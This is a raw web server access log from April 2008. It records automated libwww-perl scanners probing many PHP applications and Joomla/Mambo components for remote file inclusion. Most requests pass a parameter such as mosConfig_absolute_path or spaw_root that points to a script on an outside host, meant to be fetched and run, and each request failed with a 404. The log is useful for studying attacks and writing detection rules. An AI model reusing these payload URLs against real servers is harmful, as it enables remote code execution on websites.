217.16.16.208 - - [06/Apr/2008:20:41:05 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:41:06 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:41:06 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:41:07 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
200.105.35.14 - - [06/Apr/2008:20:41:08 -0600] "GET /logs/access_log.20080120/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.65"
213.173.177.11 - - [06/Apr/2008:20:41:29 -0600] "GET /logs/error_log//index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:20:41:29 -0600] "GET //index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:20:41:29 -0600] "GET /logs//index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
69.72.221.90 - - [06/Apr/2008:20:41:57 -0600] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
89.111.176.28 - - [06/Apr/2008:20:42:26 -0600] "GET /logs/access_log.20080120//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.111.176.28 - - [06/Apr/2008:20:42:26 -0600] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
89.111.176.28 - - [06/Apr/2008:20:42:26 -0600] "GET /logs//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.16.16.208 - - [06/Apr/2008:20:42:30 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:31 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:31 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:31 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:32 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:32 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:33 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.16.16.208 - - [06/Apr/2008:20:42:33 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
213.113.108.77 - - [06/Apr/2008:20:42:42 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
213.113.108.77 - - [06/Apr/2008:20:42:42 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
213.113.108.77 - - [06/Apr/2008:20:42:42 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
89.111.176.28 - - [06/Apr/2008:20:42:48 -0600] "GET /logs/access_log.20080127//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.111.176.28 - - [06/Apr/2008:20:43:34 -0600] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
67.15.72.52 - - [06/Apr/2008:20:44:20 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
67.15.72.52 - - [06/Apr/2008:20:44:20 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
67.15.72.52 - - [06/Apr/2008:20:44:20 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
213.113.108.77 - - [06/Apr/2008:20:44:20 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
67.15.72.52 - - [06/Apr/2008:20:44:20 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.65"
213.173.177.11 - - [06/Apr/2008:20:44:37 -0600] "GET /logs/access_log.20080120//index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
89.111.176.28 - - [06/Apr/2008:20:44:43 -0600] "GET /logs//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.111.176.28 - - [06/Apr/2008:20:44:43 -0600] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:20:46:04 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
67.15.72.52 - - [06/Apr/2008:20:46:12 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
67.15.72.52 - - [06/Apr/2008:20:46:12 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
69.72.221.90 - - [06/Apr/2008:20:46:43 -0600] "GET /logs/access_log.20080120/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:20:46:43 -0600] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
69.93.107.242 - - [06/Apr/2008:20:48:08 -0600] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
69.93.107.242 - - [06/Apr/2008:20:48:08 -0600] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
70.86.130.2 - - [06/Apr/2008:20:48:20 -0600] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.asmaasland.nl/cms2/media/special.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
70.86.130.2 - - [06/Apr/2008:20:48:20 -0600] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.asmaasland.nl/cms2/media/special.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
85.114.135.126 - - [06/Apr/2008:20:48:44 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.114.135.126 - - [06/Apr/2008:20:48:44 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
207.58.133.62 - - [06/Apr/2008:20:49:19 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
207.58.133.62 - - [06/Apr/2008:20:49:19 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
203.146.251.123 - - [06/Apr/2008:20:50:50 -0600] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 284 "-" "libwww-perl/5.65"
74.52.169.116 - - [06/Apr/2008:20:51:29 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
74.52.169.116 - - [06/Apr/2008:20:51:29 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
195.74.65.15 - - [06/Apr/2008:20:51:35 -0600] "GET /logs/access_log/[Scriptftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
195.74.65.15 - - [06/Apr/2008:20:51:35 -0600] "GET /logs/access_log/[Scriptftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
74.220.215.233 - - [06/Apr/2008:20:51:55 -0600] "GET /logs/access_log.20080203/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:51:55 -0600] "GET /main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:51:55 -0600] "GET /logs/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
195.122.243.226 - - [06/Apr/2008:20:52:33 -0600] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
195.122.243.226 - - [06/Apr/2008:20:52:33 -0600] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
83.223.100.182 - - [06/Apr/2008:20:54:33 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
83.223.100.182 - - [06/Apr/2008:20:54:34 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:54:35 -0600] "GET /logs/access_log.20080127/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:54:35 -0600] "GET /index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:54:35 -0600] "GET /logs/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
70.84.7.82 - - [06/Apr/2008:20:55:50 -0600] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
85.234.133.218 - - [06/Apr/2008:20:55:56 -0600] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 254 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
85.234.133.218 - - [06/Apr/2008:20:55:57 -0600] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
74.220.215.233 - - [06/Apr/2008:20:56:51 -0600] "GET /logs/access_log.20080120/index2.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:20:57:25 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 292 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:20:57:25 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:58:34 -0600] "GET /logs/error_log.20080203/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:58:34 -0600] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:58:35 -0600] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:58:49 -0600] "GET /logs/access_log.20080203/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.808"
85.114.135.126 - - [06/Apr/2008:20:58:51 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
84.18.207.65 - - [06/Apr/2008:20:59:39 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
82.150.65.4 - - [06/Apr/2008:20:59:39 -0600] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
84.18.207.65 - - [06/Apr/2008:20:59:39 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
82.150.65.4 - - [06/Apr/2008:20:59:39 -0600] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
74.220.215.233 - - [06/Apr/2008:21:00:17 -0600] "GET /logs/access_log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
63.247.140.59 - - [06/Apr/2008:21:00:44 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
63.247.140.59 - - [06/Apr/2008:21:00:45 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
63.247.140.59 - - [06/Apr/2008:21:00:45 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
63.247.140.59 - - [06/Apr/2008:21:00:54 -0600] "GET /logs/error_log.20080203//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
77.221.130.5 - - [06/Apr/2008:21:01:15 -0600] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
69.72.221.90 - - [06/Apr/2008:21:01:20 -0600] "GET /logs/access_log.20080106/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
72.18.192.224 - - [06/Apr/2008:21:03:50 -0600] "GET /logs/access_log.20080316//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:21:03:50 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:21:03:50 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
72.18.192.224 - - [06/Apr/2008:21:04:24 -0600] "GET /logs/error_log//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
85.234.132.103 - - [06/Apr/2008:21:04:38 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
203.146.251.123 - - [06/Apr/2008:21:05:15 -0600] "GET /logs/error_log.20080127/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:21:05:15 -0600] "GET /com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:21:05:16 -0600] "GET /logs/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
64.72.119.130 - - [06/Apr/2008:21:06:55 -0600] "GET /logs/error_log/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:06:56 -0600] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:06:56 -0600] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
69.72.221.90 - - [06/Apr/2008:21:07:19 -0600] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
64.72.119.130 - - [06/Apr/2008:21:09:58 -0600] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:09:59 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:09:59 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
70.84.7.82 - - [06/Apr/2008:21:10:00 -0600] "GET /logs/error_log.20080330/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.808"
70.84.7.82 - - [06/Apr/2008:21:10:00 -0600] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
213.215.80.102 - - [06/Apr/2008:21:10:42 -0600] "GET /logs/access_log.2008020316/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:21:10:43 -0600] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:21:10:43 -0600] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
64.72.119.130 - - [06/Apr/2008:21:11:01 -0600] "GET /logs/error_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:12:00 -0600] "GET /logs/access_log/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
77.221.130.5 - - [06/Apr/2008:21:13:21 -0600] "GET /logs/access_log.20080120//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
77.221.130.5 - - [06/Apr/2008:21:13:21 -0600] "GET /logs//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
213.215.80.102 - - [06/Apr/2008:21:13:37 -0600] "GET /logs/access_log.20080120/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
64.72.119.130 - - [06/Apr/2008:21:14:33 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:14:34 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:14:34 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
77.221.130.5 - - [06/Apr/2008:21:14:41 -0600] "GET /logs/access_log.20080127//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
70.86.152.130 - - [06/Apr/2008:21:15:14 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
70.86.152.130 - - [06/Apr/2008:21:15:14 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.72.119.130 - - [06/Apr/2008:21:16:31 -0600] "GET /logs/error_log.20080217//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 306 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:17:26 -0600] "GET /logs/error_log.20080217//Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:17:27 -0600] "GET //Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:17:27 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
81.89.137.99 - - [06/Apr/2008:21:17:30 -0600] "GET /logs/access_log.2008020316/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:21:17:30 -0600] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:21:17:31 -0600] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
64.72.119.130 - - [06/Apr/2008:21:17:34 -0600] "GET /logs/error_log/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:17:35 -0600] "GET /header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:21:17:35 -0600] "GET /logs/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
81.89.137.99 - - [06/Apr/2008:21:18:24 -0600] "GET /logs/access_log.20080120/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
74.52.169.116 - - [06/Apr/2008:21:18:26 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
74.52.169.116 - - [06/Apr/2008:21:18:26 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
